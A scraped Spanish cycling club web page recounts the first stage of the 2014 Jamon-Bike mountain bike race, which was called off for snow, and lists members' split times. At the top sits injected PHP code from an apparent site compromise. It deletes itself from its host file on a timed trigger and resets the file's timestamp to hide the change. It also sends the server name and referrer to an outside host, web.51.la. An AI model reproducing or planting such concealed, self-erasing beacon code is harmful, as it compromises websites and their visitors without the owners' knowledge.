check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Jamon-Bike 2014 Capitulo 1

La Afición

Calendario

<<  Julio 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930
31      
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Jamon-Bike 2014 Capitulo 1 PDF Imprimir E-mail
Viernes, 25 de Abril de 2014 12:37

Ya había llegado el gran reto betetero del 2014, La Jamon-Bike, allí nos encontrábamos 8 representantes silenses, Rubén Castro, Sergio Puente, Jesu Puente, Alex Puente, Andrés Álamo, Vicente Camarero, Javi Camarero y Enrique Camarero, después del gran esfuerzo durante todo el invierno de entrenamientos y porque no decirlo el esfuerzo económico de todos los integrantes para costearse el viaje, estancia e inscripción a la prueba, llegaba la hora de disfrutar la prueba.

 

Meses atrás habíamos decidido dormir en el polideportivo, posiblemente además de económico era muy cómodo por el tema logístico, Vicen y Javi los primeros en llegar se apresuraron en coger posiblemente el mejor lugar del  polideportivo. Una vez todos ya reunidos y ubicados en la sensacional suite en el polideportivo cenamos para luego rápido intentar descansar lo máximo posible, al día siguiente nos esperaba la primera y más dura etapa de la Jamon, 135 kms y 2500 metros de desnivel positivo.

Amanece en Calamocha, Enrique se levanta antes que nadie (creemos que era el encargado de despertar al gallo) y poco a poco va despertando a todos los integrantes, rápidamente a desayunar, había que cargar bien las pilas el día se presumía muy largo.

El día era fresco, pero ya sabíamos a lo que íbamos, era Teruel!!! Decidimos salir bien tapados arriba con cazadoras térmicas y culotte corto, la mochila con guantes de repuesto y calcetines, sabíamos que deberíamos de pasar un rio en repetidas ocasiones.

Nuestra intención era colocarnos en la parte media del pelotón, pero como siempre sino es por A es por B terminamos llegando de los últimos al cajón de salida, la segunda premisa de los primeros kilómetros era la de conseguir meterse en grupos numerosos para protegerse del fuerte viento que hacía, solo Alex fue capaz de ello. Los primeros kilómetros ascendentes casi todos, en los primeros 33 kms hasta el PC1 teníamos que salvar un desnivel de casi 1000 metros. Según transcurrían los kilómetros el equipo silense se iba agrupando, menos Alex que iba con los mejores. La niebla y el chirimiri empezaban a darse cita y según se iba ascendiendo se convertía en frio y nieve, algo que a los participantes silenses no les parecía tan extraño, Marzo Teruel 1400 metros de altura….. pues eso un frio del carajo!!!! Pero nada inaguantable para nosotros que íbamos bien ataviados.

El primero en llegar al PC1 Alex, y lo primero que oye  ¡!!!Carrera Neutralizada!!!  ¡!!!Carrera suspendida!!!, contrariado y de mala leche decide estar poco parado y volver a Calamocha (40 kms) en bici, puesto que solo a los que estaban en peores condiciones les bajaban en autobuses.

Poco a poco todos los componentes del club seguían llegando al PC1, Enrique, Javi, Vicen, Andrés, Sergio y Jesu. Todos nos íbamos enterando que la carrera estaba suspendida y lo aceptábamos con resignación, alguno incluso con alegría!!! Ó más de uno!!!. Jesu con vaso de caldo en la mano y con un carrillo lleno no paró de decir: - La organización ha hecho lo correcto!!!

Unos en bici y otros en autobuses volvemos a Calamocha y nos reencontramos todos otra vez, momento para contarnos las batallitas de la primera etapa y conversar con otros grupos de bikers sobre lo sucedido.

Quedaba una larga tarde en el cuartel general, lo que decidimos pasarlo lo mejor posible entre el hotel y el polideportivo, retos de cartas contra los Pedales de Burgos etc…etc…etc…, y así pasaríamos la tarde…..a todo esto Jesu seguía diciendo que la organización había hecho lo correcto. Ya echada la noche después de la buena cena que nos dio la organización, retirada al polideportivo a descansar, al día siguiente tocaba la segunda etapa de 65 Kms……..TO BE CONTINUE

Clasificación primera etapa PC1

Alex       2h08min17sg

Enrique  2h23min55sg

Javi       2h26min46sg

Vicen     2h26min56sg

Andrés   2h28min29sg

Sergio    2h28min32sg

 

Jesu        2h28min38sg

 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.